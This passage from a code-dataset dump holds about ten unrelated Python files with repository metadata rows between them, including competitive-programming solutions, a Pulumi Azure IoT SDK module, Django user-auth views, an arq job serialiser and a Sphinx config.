dx, dy = VECTORS[step]
x += dx
y += dy
return x, y
def lobby_layout_1():
result = set()
for path in tiles:
tile = walk(path)
if tile in result:
result.remove(tile)
else:
result.add(tile)
return result
def neighbors(tile):
yield from ((tile[0] + dx, tile[1] + dy) for dx, dy in VECTORS.values())
def lobby_layout_2(blackTiles):
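    # 100 days of Conway-style evolution: a black tile stays black with 1 or 2
    # black neighbours; a white tile turns black with exactly 2.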
for day in range(100):
newTiles = set()
affectedTiles = blackTiles.copy()
for tile in blackTiles:
affectedTiles.update(neighbors(tile))
for tile in affectedTiles:
numNeighbors = sum(n in blackTiles for n in neighbors(tile))
if tile in blackTiles:
if numNeighbors in (1, 2):
newTiles.add(tile)
else:
if numNeighbors == 2:
newTiles.add(tile)
blackTiles = newTiles
return len(blackTiles)
if __name__ == '__main__':
input_data = read_and_load_input("Day24")
tiles = [parse(line.rstrip()) for line in input_data]
blackTiles = lobby_layout_1()
print(f"Solution 1: {len(blackTiles)}")
print(f"Solution 2: {lobby_layout_2(blackTiles)}")
|
[
"[email protected]"
] | |
04c0a9aa06b8567653908c8159d470bb3be89b2d
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_200/5468.py
|
063e5c8d196c9bfcca7a5d638432897002ca1793
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 290 |
py
|
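# This looks like Code Jam's "Tidy Numbers": for each N, count down to the
# largest number <= N whose digits never decrease from left to right.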
dirt=[]
k=1
t=input()
for j in range(t):
n=input();w=n
while(w):
c=0;g=n%10
n=w;q=(n)%10;m=-2
while(n):
d=n%10
if c>=1:
if q<d:
break
q=d;n/=10;
c+=1;g=d
if n==0:
dirt.append(w)
break
w=w-1
for i in dirt:
print "Case #{0}: {1}".format(k,i)
k+=1
|
[
"[email protected]"
] | |
a5ddd507e15815aaad86ceaaa47e2a295133f13d
|
48e124e97cc776feb0ad6d17b9ef1dfa24e2e474
|
/sdk/python/pulumi_azure_native/devices/v20160203/list_iot_hub_resource_keys.py
|
42ce719ca651ad316e0363197087b52eff4ffe47
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
bpkgoud/pulumi-azure-native
|
0817502630062efbc35134410c4a784b61a4736d
|
a3215fe1b87fba69294f248017b1591767c2b96c
|
refs/heads/master
| 2023-08-29T22:39:49.984212 | 2021-11-15T12:43:41 | 2021-11-15T12:43:41 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,383 |
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'ListIotHubResourceKeysResult',
'AwaitableListIotHubResourceKeysResult',
'list_iot_hub_resource_keys',
'list_iot_hub_resource_keys_output',
]
@pulumi.output_type
class ListIotHubResourceKeysResult:
"""
The list of shared access policies with a next link.
"""
def __init__(__self__, next_link=None, value=None):
if next_link and not isinstance(next_link, str):
raise TypeError("Expected argument 'next_link' to be a str")
pulumi.set(__self__, "next_link", next_link)
if value and not isinstance(value, list):
raise TypeError("Expected argument 'value' to be a list")
pulumi.set(__self__, "value", value)
@property
@pulumi.getter(name="nextLink")
def next_link(self) -> str:
"""
The next link.
"""
return pulumi.get(self, "next_link")
@property
@pulumi.getter
def value(self) -> Optional[Sequence['outputs.SharedAccessSignatureAuthorizationRuleResponse']]:
"""
The list of shared access policies.
"""
return pulumi.get(self, "value")
class AwaitableListIotHubResourceKeysResult(ListIotHubResourceKeysResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return ListIotHubResourceKeysResult(
next_link=self.next_link,
value=self.value)
def list_iot_hub_resource_keys(resource_group_name: Optional[str] = None,
resource_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableListIotHubResourceKeysResult:
"""
The list of shared access policies with a next link.
:param str resource_group_name: The name of the resource group that contains the IoT hub.
:param str resource_name: The name of the IoT hub.
"""
__args__ = dict()
__args__['resourceGroupName'] = resource_group_name
__args__['resourceName'] = resource_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:devices/v20160203:listIotHubResourceKeys', __args__, opts=opts, typ=ListIotHubResourceKeysResult).value
return AwaitableListIotHubResourceKeysResult(
next_link=__ret__.next_link,
value=__ret__.value)
@_utilities.lift_output_func(list_iot_hub_resource_keys)
def list_iot_hub_resource_keys_output(resource_group_name: Optional[pulumi.Input[str]] = None,
resource_name: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[ListIotHubResourceKeysResult]:
"""
The list of shared access policies with a next link.
:param str resource_group_name: The name of the resource group that contains the IoT hub.
:param str resource_name: The name of the IoT hub.
"""
...
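# Hypothetical usage sketch (not part of the generated module); the resource
# names are made up and `key_name` is assumed from the Azure
# SharedAccessSignatureAuthorizationRule schema:
#   keys = list_iot_hub_resource_keys(resource_group_name='my-rg',
#                                     resource_name='my-iot-hub')
#   policy_names = [rule.key_name for rule in (keys.value or [])]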
|
[
"[email protected]"
] | |
e7f28841c3cab7b1b034f5d0de68744734459162
|
f8c35a47c7199aed0747e91e5c36ec97e7543de1
|
/custom/icds_reports/management/commands/generate_migration_tables.py
|
868e4fe59a2acf305643ee8eed39d62f19f82f18
|
[] |
no_license
|
dr-aryone/commcare-hq
|
13a3f2a39382e3f6fe1f19d6c08bb61b808c146d
|
3e7e09247fc8d1246ccfc77c1fff8603c9f65228
|
refs/heads/master
| 2020-05-27T14:29:48.923458 | 2019-05-26T00:01:33 | 2019-05-26T00:01:33 | 188,650,727 | 2 | 1 | null | 2019-05-26T07:03:18 | 2019-05-26T07:03:18 | null |
UTF-8
|
Python
| false | false | 6,056 |
py
|
from __future__ import absolute_import, print_function
from __future__ import unicode_literals
import logging
import re
import sqlite3
from django.core.management import CommandError
from django.core.management.base import BaseCommand
from sqlalchemy import inspect as sqlinspect
from corehq.apps.userreports.models import StaticDataSourceConfiguration
from corehq.apps.userreports.util import get_indicator_adapter, UCR_TABLE_PREFIX
from corehq.sql_db.connections import connection_manager
from custom.icds_reports.const import DASHBOARD_DOMAIN
from custom.icds_reports.management.commands.create_citus_child_tables import keep_child_tables, plain_tables, \
drop_child_tables, get_parent_child_mapping
from custom.icds_reports.models import AggregateSQLProfile
logger = logging.getLogger(__name__)
IGNORE_TABLES = {
'django_migrations',
AggregateSQLProfile._meta.db_table,
'ucr_table_name_mapping',
}
CREATE_TABLE = """
CREATE TABLE IF NOT EXISTS tables (
id integer PRIMARY KEY,
source_table text NOT NULL,
date text,
target_table text,
migrated integer
); """
def get_all_tables(connection):
res = connection.execute("select tablename from pg_tables where schemaname = 'public'")
return {row.tablename for row in res}
class Command(BaseCommand):
def add_arguments(self, parser):
parser.add_argument('output_database')
parser.add_argument(
'--source-engine-id', default='icds-ucr',
help='Django alias for source database'
)
def handle(self, output_database, source_engine_id, **options):
with connection_manager.get_engine(source_engine_id).begin() as conn:
self.parent_child_mapping = get_parent_child_mapping(conn)
self.child_parent_mapping = {
child: parent
for parent, children in self.parent_child_mapping.items()
for child in children
}
self.table_count = 0
self.db = sqlite3.connect(output_database)
try:
self.setup_sqlite_db()
self.generate_dump_script(source_engine_id)
self.stdout.write("\n{} tables processed\n".format(self.table_count))
finally:
self.db.close()
def setup_sqlite_db(self):
with self.db:
self.db.execute(CREATE_TABLE)
res = self.db.execute('select count(*) from tables')
if res.fetchone()[0] > 0:
raise CommandError('Database already has records. Delete it and re-run command.')
def insert_row(self, row):
self.table_count += 1
with self.db:
self.db.execute('INSERT INTO tables(source_table, date, target_table) values (?,?,?)', row)
def generate_dump_script(self, source_engine_id):
self.seen_tables = set()
source_engine = connection_manager.get_engine(source_engine_id)
# direct dump and load from parent + child tables
with source_engine.begin() as source_conn:
insp = sqlinspect(source_conn)
for table in keep_child_tables + plain_tables:
for line in self.get_table_date_target(insp, table):
self.insert_row(line)
# direct dump and load from parent
# dump from all child tables into parent table
for table in drop_child_tables:
for line in self.get_table_date_target(insp, table, all_in_parent=True):
self.insert_row(line)
for datasource in StaticDataSourceConfiguration.by_domain(DASHBOARD_DOMAIN):
if source_engine_id == datasource.engine_id or source_engine_id in datasource.mirrored_engine_ids:
adapter = get_indicator_adapter(datasource)
table_name = adapter.get_table().name
# direct dump and load from parent
# dump from all child tables into parent table
                # - if table is distributed, citus will distribute the data
# - if table is partitioned the triggers on the parent will distribute the data
for line in self.get_table_date_target(insp, table_name, all_in_parent=True):
self.insert_row(line)
all_tables = get_all_tables(source_conn)
remaining_tables = all_tables - self.seen_tables - IGNORE_TABLES
icds_ucr_prefix = '{}{}_'.format(UCR_TABLE_PREFIX, DASHBOARD_DOMAIN)
def keep_table(table):
root_table = self.child_parent_mapping.get(table, table)
return not root_table.startswith(UCR_TABLE_PREFIX) or root_table.startswith(icds_ucr_prefix)
remaining_tables = list(filter(keep_table, remaining_tables))
if remaining_tables:
self.stderr.write("Some tables not seen:")
for t in remaining_tables:
parent = self.child_parent_mapping.get(t)
if parent:
self.stderr.write("\t{} (parent: {})".format(t, parent))
else:
self.stderr.write("\t{}".format(t))
    def get_table_date_target(self, sql_inspector, table, all_in_parent=False):
        yield table, None, None
        self.seen_tables.add(table)
        for child in self.parent_child_mapping[table]:
            self.seen_tables.add(child)
            yield child, get_table_date(sql_inspector, child), table if all_in_parent else None
def get_table_date(sql_inspector, table):
def _get_date(string):
match = re.match(r'.*(\d{4}-\d{2}-\d{2}).*', string)
if match:
return match.groups()[0]
date = _get_date(table)
if not date:
constraints = [
            constraint for constraint in sql_inspector.get_check_constraints(table)
if constraint['name'].startswith(table)
]
if constraints:
date = _get_date(constraints[0]['sqltext'])
return date
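# Hypothetical invocation sketch (not in the original file): Django derives the
# command name from this module's filename, so it would be run as:
#   python manage.py generate_migration_tables output.db --source-engine-id icds-ucr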
|
[
"[email protected]"
] | |
19aab88df7aec32b7971ae1f9f4d9863c192e9e8
|
965fe92b03b37d2e6fa700281c4ef383fb104ada
|
/sciencebeam_trainer_delft/sequence_labelling/debug.py
|
53a1befadf92215d50210611fddba0ded0508508
|
[
"MIT"
] |
permissive
|
elifesciences/sciencebeam-trainer-delft
|
1591bebb7f5b9ed178329f4e9e02a9d893ab228d
|
2413fe7f0801869208741e4ab6c4096db8d53b5e
|
refs/heads/develop
| 2022-05-20T21:55:13.210432 | 2022-03-28T17:32:31 | 2022-03-28T17:32:31 | 192,557,708 | 5 | 1 |
MIT
| 2022-03-28T17:33:14 | 2019-06-18T14:34:50 |
Python
|
UTF-8
|
Python
| false | false | 3,133 |
py
|
import os
import logging
import time
from contextlib import contextmanager
from pathlib import Path
from typing import IO, Iterator, Optional
import numpy as np
from sciencebeam_trainer_delft.sequence_labelling.tag_formatter import (
TagOutputFormats,
format_tag_result
)
LOGGER = logging.getLogger(__name__)
SCIENCEBEAM_DELFT_TAGGING_DEBUG_OUT = "SCIENCEBEAM_DELFT_TAGGING_DEBUG_OUT"
@contextmanager
def exclusive_prefixed_file(prefix: str, suffix: str = '') -> Iterator[IO]:
for index in range(1, 10000):
filename = '%s-%d%s' % (prefix, index, suffix)
try:
with open(filename, mode='x', encoding='utf-8') as fileobj:
yield fileobj
return
except FileExistsError:
continue
raise FileExistsError('could not create any prefixed file: %s, suffix: %s' % (prefix, suffix))
class TagDebugReporter:
def __init__(self, output_directory: str):
self.output_directory = output_directory
def get_base_output_name(self, model_name: str) -> str:
return os.path.join(self.output_directory, 'sciencebeam-delft-%s-%s' % (
round(time.time()),
model_name
))
def report_tag_results(
self,
            texts: np.ndarray,
            features: np.ndarray,
annotations,
model_name: str):
base_filename_prefix = self.get_base_output_name(model_name=model_name)
with exclusive_prefixed_file(base_filename_prefix, '.json') as json_fp:
output_file = json_fp.name
filename_prefix = os.path.splitext(output_file)[0]
LOGGER.info('tagger, output_file: %s', output_file)
format_tag_result_kwargs = dict(
tag_result=annotations,
texts=texts,
features=features,
model_name=model_name
)
formatted_text = format_tag_result(
output_format=TagOutputFormats.TEXT,
**format_tag_result_kwargs
)
Path(filename_prefix + '.txt').write_text(formatted_text, encoding='utf-8')
formatted_json = format_tag_result(
output_format=TagOutputFormats.JSON,
**format_tag_result_kwargs
)
json_fp.write(formatted_json)
formatted_xml = format_tag_result(
output_format=TagOutputFormats.XML,
**format_tag_result_kwargs
)
Path(filename_prefix + '.xml').write_text(formatted_xml, encoding='utf-8')
if features is not None:
formatted_data = format_tag_result(
output_format=TagOutputFormats.DATA,
**format_tag_result_kwargs
)
Path(filename_prefix + '.data').write_text(formatted_data, encoding='utf-8')
def get_tag_debug_reporter_if_enabled() -> Optional[TagDebugReporter]:
output_directory = os.environ.get(SCIENCEBEAM_DELFT_TAGGING_DEBUG_OUT)
if not output_directory:
return None
return TagDebugReporter(output_directory)
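# Hypothetical usage sketch (not in the original module); variable names are
# made up:
#   os.environ[SCIENCEBEAM_DELFT_TAGGING_DEBUG_OUT] = '/tmp/tag-debug'
#   reporter = get_tag_debug_reporter_if_enabled()
#   if reporter is not None:
#       reporter.report_tag_results(texts, features, annotations, 'header')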
|
[
"[email protected]"
] | |
d4ee6961649aca8865294008a94b35181bbe50bc
|
54f352a242a8ad6ff5516703e91da61e08d9a9e6
|
/Source Codes/CodeJamData/14/03/5.py
|
44713545f4a1f6d56fb33b4f7f95aaa4764dea56
|
[] |
no_license
|
Kawser-nerd/CLCDSA
|
5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb
|
aee32551795763b54acb26856ab239370cac4e75
|
refs/heads/master
| 2022-02-09T11:08:56.588303 | 2022-01-26T18:53:40 | 2022-01-26T18:53:40 | 211,783,197 | 23 | 9 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,620 |
py
|
def trans(a):
return map(lambda x: ''.join(list(x)), zip(*a))
def can(r, c, m):
if r > c: r, c = c, r
safe = r * c - m
if r == 1 or safe == 1:
return True
elif r == 2:
return safe % 2 == 0 and safe >= 4
else:
return not safe in [2, 3, 5, 7]
def solve(r, c, m):
if not can(r, c, m):
print 'Impossible'
return
swapped = False
if r > c: r, c, swapped = c, r, True
ans, safe = [['.'] * c for _ in xrange(r)], r * c - m
if r == 1:
for i in xrange(safe, c):
ans[0][i] = '*'
elif r == 2:
for i in xrange(safe // 2, c):
ans[0][i] = ans[1][i] = '*'
elif m <= (r - 2) * (c - 2):
for i in xrange(m):
ans[r - i % (r - 2) - 1][c - i // (r - 2) - 1] = '*'
else:
ans = [['*'] * c for _ in xrange(r)]
if safe <= 6:
for i in xrange(safe // 2):
ans[i][0] = ans[i][1] = '.'
else:
for i in xrange(8):
ans[i % 3][i // 3] = '.'
safe -= 8
if safe % 2 == 1:
ans[2][2] = '.'
safe -= 1
a = min(r - 3, safe // 2)
for i in xrange(a):
ans[3 + i][0] = ans[3 + i][1] = '.'
safe -= 2 * a
for i in xrange(safe // 2):
ans[0][3 + i] = ans[1][3 + i] = '.'
ans[0][0] = 'c'
if swapped: ans = trans(ans)
for row in ans: print ''.join(row)
T = input()
for i in xrange(T):
[r, c, m] = map(int, raw_input().split())
print 'Case #%d:' % (i + 1)
solve(r, c, m)
|
[
"[email protected]"
] | |
b6176db9cf906b94b069180306ba7dc935c84b19
|
4061f9f2a7dc2acde4c4c630fbe10ac8f5913f5d
|
/user/views.py
|
6059ac2806bf2a9c4bcdc72bc67893bae2b34d3b
|
[] |
no_license
|
eibrahimarisoy/tasty_dishes
|
8b9db3129c4d670f71a9e64025b25f51646c9e36
|
ddfa3286bca06e153fbbd1e1a0d914c9f31d008e
|
refs/heads/master
| 2022-12-04T00:45:55.607207 | 2020-04-03T09:42:31 | 2020-04-03T09:42:31 | 252,424,641 | 0 | 0 | null | 2022-11-22T05:27:25 | 2020-04-02T10:29:54 |
JavaScript
|
UTF-8
|
Python
| false | false | 4,511 |
py
|
from django.contrib import messages
from django.contrib.auth import authenticate, login, logout, update_session_auth_hash
from django.contrib.auth.decorators import login_required
from django.contrib.auth.forms import PasswordChangeForm
from django.contrib.auth.models import User
from django.shortcuts import get_object_or_404, redirect, render
from user.forms import RegisterForm, LoginForm, UserUpdateForm
from recipe.models import Recipe
STATUS = "published"
def user_register(request):
context = dict()
form = RegisterForm(request.POST or None)
if form.is_valid():
# get new user information from form
username = form.clean_username()
first_name = form.clean_first_name()
last_name = form.clean_last_name()
email = form.clean_email()
password = form.clean_password()
# create new user and set_password and set active
new_user = User(username=username, last_name=last_name,
first_name=first_name, email=email)
new_user.set_password(password)
new_user.is_active = True
new_user.save()
# login new user
login(request, new_user)
messages.success(request, "You have successfully registered.")
return redirect("index")
context["register_form"] = form
return render(request, "user/register.html", context)
def user_login(request):
context = dict()
form = LoginForm(request.POST or None)
context["form"] = form
if form.is_valid():
email = form.cleaned_data.get("email")
password = form.cleaned_data.get("password")
# if username is not exists throw and error to user
try:
username = User.objects.get(email=email).username
except User.DoesNotExist:
messages.info(request, "Username is wrong.")
return render(request, "user/login.html", context)
# check username and password are correct
user = authenticate(request, username=username, password=password)
if user is None:
messages.info(request, "Username or password is wrong")
return render(request, "user/login.html", context)
else:
messages.success(request, "You have successfully logged in.")
# start new session for user
login(request, user)
return redirect("index")
return render(request, "user/login.html", context)
@login_required()
def user_logout(request):
logout(request)
messages.success(request, "You have successfully logged out.")
return redirect("index")
@login_required()
def user_like_recipe_list(request):
# to send user's favorite recipes to template
context = dict()
user = request.user
recipes = Recipe.objects.filter(likes=user)
context['recipes'] = recipes
return render(request, "user/like_recipe_list.html", context)
@login_required()
def user_recipe_list(request):
# to show the user their own recipes
context = dict()
user = request.user
recipes = Recipe.objects.filter(
owner=user,
status=STATUS,
)
context['recipes'] = recipes
return render(request, "user/recipe_list.html", context)
@login_required()
def user_profile(request):
context = dict()
user = get_object_or_404(User, pk=request.user.pk)
context['user'] = user
return render(request, "user/profile.html", context)
@login_required()
def update_user_profile(request):
context = dict()
form = UserUpdateForm(request.POST or None, instance=request.user)
context['form'] = form
if request.method == "POST":
if form.is_valid():
form.save()
messages.success(request, "Your profile updated successfully.")
return redirect("user_profile")
return render(request, "user/update_profile.html", context)
@login_required()
def change_password(request):
context = dict()
if request.method == 'POST':
form = PasswordChangeForm(request.user, request.POST)
if form.is_valid():
user = form.save()
update_session_auth_hash(request, user)
messages.success(request, 'Your password has been successfully changed!')
return redirect('user_profile')
else:
            messages.error(request, 'Please correct the errors below.')
else:
form = PasswordChangeForm(request.user)
context['form'] = form
return render(request, 'user/change_password.html', context)
|
[
"[email protected]"
] | |
fa3f5466ad8bcab2dadb823615e08fc9e14db94a
|
c0795000de54a26956efe1a87afba507bb328b81
|
/docs/conf.py
|
ccd96e7307cb1b7e20bed096c7eb0dfae85de6c9
|
[
"MIT"
] |
permissive
|
steinitzu/beets
|
ff6c24d9e072b3d86f889e2b9af66a6ca2374d09
|
1fbbe6154698ce50f1a7e8d32af9a6376e2c7ede
|
refs/heads/master
| 2021-01-16T20:26:07.732280 | 2013-02-28T18:43:02 | 2013-02-28T18:43:02 | 7,949,551 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 972 |
py
|
AUTHOR = u'Adrian Sampson'
# -- General configuration -----------------------------------------------------
extensions = []
#templates_path = ['_templates']
exclude_patterns = ['_build']
source_suffix = '.rst'
master_doc = 'index'
project = u'beets'
copyright = u'2012, Adrian Sampson'
version = '1.1'
release = '1.1b3'
pygments_style = 'sphinx'
# -- Options for HTML output ---------------------------------------------------
html_theme = 'default'
#html_static_path = ['_static']
htmlhelp_basename = 'beetsdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_documents = [
('index', 'beets.tex', u'beets Documentation',
AUTHOR, 'manual'),
]
# -- Options for manual page output --------------------------------------------
man_pages = [
('reference/cli', 'beet', u'music tagger and library organizer',
[AUTHOR], 1),
('reference/config', 'beetsconfig', u'beets configuration file',
[AUTHOR], 5),
]
|
[
"[email protected]"
] | |
2ea747e7a97063f59f0d0d4584ff5c12e534398b
|
90deb98bd63bdc0f08d80954d3edb3a277e63cd1
|
/arq/jobs.py
|
1d4c756caae0842df1a7973d086f698534b73085
|
[
"MIT"
] |
permissive
|
filmor/arq
|
93a97852eb2aa554ce2c6d548fcfa7dac35b74b4
|
f0b4b8b4db2df0c950069f98d5d62c104912e48d
|
refs/heads/master
| 2020-03-13T21:08:36.514480 | 2018-01-10T15:36:23 | 2018-01-10T15:36:23 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,365 |
py
|
"""
:mod:`jobs`
===========
Defines the ``Job`` class and descendants which deal with encoding and decoding job data.
"""
import base64
import os
from datetime import datetime
import msgpack
from .utils import DEFAULT_CURTAIL, from_unix_ms, timestamp, to_unix_ms_tz, truncate
__all__ = ['JobSerialisationError', 'Job', 'DatetimeJob']
class ArqError(Exception):
pass
class JobSerialisationError(ArqError):
pass
def gen_random():
"""
    generate a lowercase alphanumeric random string of length 16.
    Should have more randomness for its size than a uuid
"""
return base64.b32encode(os.urandom(10))[:16].decode().lower()
# "device control one" should be fairly unique as a dict key and only one byte
DEVICE_CONTROL_ONE = '\x11'
class Job:
"""
Main Job class responsible for encoding and decoding jobs as they go
into and come out of redis.
"""
__slots__ = 'id', 'queue', 'queued_at', 'class_name', 'func_name', 'args', 'kwargs', 'raw_queue', 'raw_data'
def __init__(self, raw_data: bytes, *, queue_name: str=None, raw_queue: bytes=None) -> None:
"""
        Create a job instance by decoding a job definition, eg. from redis.
:param raw_data: data to decode, as created by :meth:`arq.jobs.Job.encode`
:param raw_queue: raw name of the queue the job was taken from
:param queue_name: name of the queue the job was dequeued from
"""
self.raw_data = raw_data
if queue_name is None and raw_queue is None:
raise ArqError('either queue_name or raw_queue are required')
self.queue = queue_name or raw_queue.decode()
self.raw_queue = raw_queue or queue_name.encode()
self.queued_at, self.class_name, self.func_name, self.args, self.kwargs, self.id = self.decode_raw(raw_data)
self.queued_at /= 1000
@classmethod
def encode(cls, *, job_id: str=None, queued_at: int=None, class_name: str, func_name: str,
args: tuple, kwargs: dict) -> bytes:
"""
Create a byte string suitable for pushing into redis which contains all
required information about a job to be performed.
:param job_id: id to use for the job, leave blank to generate a uuid
        :param queued_at: unix time in ms when the job was queued; if None, now is used
:param class_name: name (see :attr:`arq.main.Actor.name`) of the actor class where the job is defined
        :param func_name: name of the function to be called
:param args: arguments to pass to the function
        :param kwargs: keyword arguments to pass to the function
"""
queued_at = queued_at or int(timestamp() * 1000)
try:
return cls.encode_raw([queued_at, class_name, func_name, args, kwargs, cls.generate_id(job_id)])
except TypeError as e:
raise JobSerialisationError(str(e)) from e
@classmethod
def generate_id(cls, given_id):
return given_id or gen_random()
@classmethod
def msgpack_encoder(cls, obj):
"""
The default msgpack encoder, adds support for encoding sets.
"""
if isinstance(obj, set):
return {DEVICE_CONTROL_ONE: list(obj)}
else:
return obj
@classmethod
def msgpack_object_hook(cls, obj):
if len(obj) == 1 and DEVICE_CONTROL_ONE in obj:
return set(obj[DEVICE_CONTROL_ONE])
return obj
@classmethod
def encode_raw(cls, data) -> bytes:
return msgpack.packb(data, default=cls.msgpack_encoder, use_bin_type=True)
@classmethod
def decode_raw(cls, data: bytes):
return msgpack.unpackb(data, object_hook=cls.msgpack_object_hook, encoding='utf8')
def to_string(self, args_curtail=DEFAULT_CURTAIL):
arguments = ''
if self.args:
arguments = ', '.join(map(str, self.args))
if self.kwargs:
if arguments:
arguments += ', '
arguments += ', '.join(f'{k}={v!r}' for k, v in sorted(self.kwargs.items()))
return '{s.id:.6} {s.class_name}.{s.func_name}({args})'.format(s=self, args=truncate(arguments, args_curtail))
def short_ref(self):
return '{s.id:.6} {s.class_name}.{s.func_name}'.format(s=self)
def __str__(self):
return self.to_string()
def __repr__(self):
return f'<Job {self} on {self.queue}>'
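# Hypothetical round-trip sketch (not in the original module); the actor and
# function names are made up:
#   raw = Job.encode(class_name='Downloader', func_name='fetch',
#                    args=('https://example.com',), kwargs={'retry': 2})
#   job = Job(raw, queue_name='dft')
#   str(job)  # e.g. "a1b2c3 Downloader.fetch(https://example.com, retry=2)"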
DEVICE_CONTROL_TWO = '\x12'
TIMEZONE = 'O'
class DatetimeJob(Job):
"""
    Alternative Job which copes with datetimes. Timezone-aware (non-naïve) datetimes
    are supported, but the returned datetimes will use a :mod:`datetime.timezone` class
    to define the timezone regardless of the timezone class originally used on the
    datetime object (eg. ``pytz``).
"""
@classmethod
def msgpack_encoder(cls, obj):
if isinstance(obj, datetime):
ts, tz = to_unix_ms_tz(obj)
result = {DEVICE_CONTROL_TWO: ts}
if tz is not None:
result[TIMEZONE] = tz
return result
else:
return super().msgpack_encoder(obj)
@classmethod
def msgpack_object_hook(cls, obj):
if len(obj) <= 2 and DEVICE_CONTROL_TWO in obj:
return from_unix_ms(obj[DEVICE_CONTROL_TWO], utcoffset=obj.get(TIMEZONE))
else:
return super().msgpack_object_hook(obj)
|
[
"[email protected]"
] | |
f7b3033abbffc59bb77ce0801784a595aa9821d1
|
4be5c172c84e04c35677f5a327ab0ba592849676
|
/python/leetcode/unique_paths_ii/unique_paths_ii.py
|
3cdf92f1c359c3b7d2a6b32488d8026d34b9638a
|
[] |
no_license
|
niranjan-nagaraju/Development
|
3a16b547b030182867b7a44ac96a878c14058016
|
d193ae12863971ac48a5ec9c0b35bfdf53b473b5
|
refs/heads/master
| 2023-04-06T20:42:57.882882 | 2023-03-31T18:38:40 | 2023-03-31T18:38:40 | 889,620 | 9 | 2 | null | 2019-05-27T17:00:29 | 2010-09-05T15:58:46 |
Python
|
UTF-8
|
Python
| false | false | 3,955 |
py
|
'''
https://leetcode.com/problems/unique-paths-ii/
63. Unique Paths II
A robot is located at the top-left corner of a m x n grid (marked 'Start' in the diagram below).
The robot can only move either down or right at any point in time. The robot is trying to reach the bottom-right corner of the grid (marked 'Finish' in the diagram below).
Now consider if some obstacles are added to the grids. How many unique paths would there be?
An obstacle and empty space is marked as 1 and 0 respectively in the grid.
Note: m and n will be at most 100.
Example 1:
Input:
[
[0,0,0],
[0,1,0],
[0,0,0]
]
Output: 2
Explanation:
There is one obstacle in the middle of the 3x3 grid above.
There are two ways to reach the bottom-right corner:
1. Right -> Right -> Down -> Down
2. Down -> Down -> Right -> Right
'''
'''
Solution Outline:
0. Allowed directions are R, D
1. Consider moving to cell x,y from 0,0
If there were no obstacles, it would be (num_paths_to(x-1,y) + num_paths_to(x,y-1))
with num_paths_to(x,0) == 1, (only direction allowed is down)
and num_paths_to(0,y) == 1 (only direction allowed is right) {for any 0<=x<m,0<=y<n}
2. With obstacles,
if x,0 is an obstacle,
then the column looks like (x=2 in the example)
[[0
[0
[1
[0
[0 0 . . .
num_paths_to(0,0) = 1
num_paths_to(1,0) = 1
num_paths_to(2,0) = 0 (blockade)
	num_paths_to(3,0) = 0 (can't get past the blockade moving only D)
num_paths_to(4,0) = 0
Similarly, if (0,y) is an obstacle,
then the first row looks like (y=1 in the example)
[[0 1 0 0 0 0]
num_paths_to(0,0) = 1
num_paths_to(0,1) = 0 (blockade)
num_paths_to(0,y) = 0 (for all y > 1) (can't get past blockade moving only R)
For any random(x,y),
if x,y is an obstacle, then num_paths_to(x,y) = 0
otherwise,
num_paths_to(x,y) = sum(num_paths_to(x-1,y), num_paths_to(x,y-1))
Sample run 1:
A= [
[0,0,0],
[0,1,0],
[0,0,0]
]
DP: [
[0,0,0],
[0,0,0],
[0,0,0]
]
Fill DP row 0,
DP: [
[1,1,1],
[0,0,0],
[0,0,0]
]
Fill DP col 0,
DP: [
[1,1,1],
[1,0,0],
[1,0,0]
]
(x,y): (1,1) is a blockade
DP: [
[1,1,1],
[1,0,0],
[1,0,0]
]
(x,y): (1,2) == sum(left, up) == sum(DP[1,1], DP[0,2]) == 1
DP: [
[1,1,1],
[1,0,1],
[1,0,0]
]
(x,y): (2,1) == sum(left,up) == sum(DP[2,0], DP[1,1]) == 1
DP: [
[1,1,1],
[1,0,1],
[1,1,0]
]
(x,y): (2,2) == sum(left,up) == sum(DP[2,1], DP[1,2]) == 2
DP: [
[1,1,1],
[1,0,1],
[1,1,2]
]
'''
class Solution(object):
def uniquePathsWithObstacles(self, obstacleGrid):
"""
:type obstacleGrid: List[List[int]]
:rtype: int
"""
if not obstacleGrid:
return 0
m = len(obstacleGrid)
n = len(obstacleGrid[0])
# End cell is blocked
if obstacleGrid[-1][-1] == 1:
return 0
DP = [[0 for _ in xrange(n)] for _ in xrange(m)]
# first row
for j in xrange(n):
if obstacleGrid[0][j] == 1:
break
DP[0][j] = 1
# first column
for i in xrange(m):
if obstacleGrid[i][0] == 1:
break
DP[i][0] = 1
for i in xrange(1, m):
for j in xrange(1, n):
if obstacleGrid[i][j] == 0:
DP[i][j] = DP[i-1][j] + DP[i][j-1]
# if A[i][j] is an obstacle, DP[i][j] remains 0
return DP[-1][-1]
if __name__ == '__main__':
s = Solution()
assert s.uniquePathsWithObstacles(\
[
[0,0,0],
[0,1,0],
[0,0,0]
]) == 2
assert s.uniquePathsWithObstacles(\
[
[0,0,0],
[0,1,0],
[0,0,1]
]) == 0
assert s.uniquePathsWithObstacles(\
[
[0,0,1,0],
[0,1,0,0],
[0,0,0,0],
[1,0,0,0]
]) == 3
assert s.uniquePathsWithObstacles(\
[
[0,0,1,0],
[0,1,0,0],
[0,0,0,0],
[0,0,0,0],
[1,0,0,0]
]) == 9
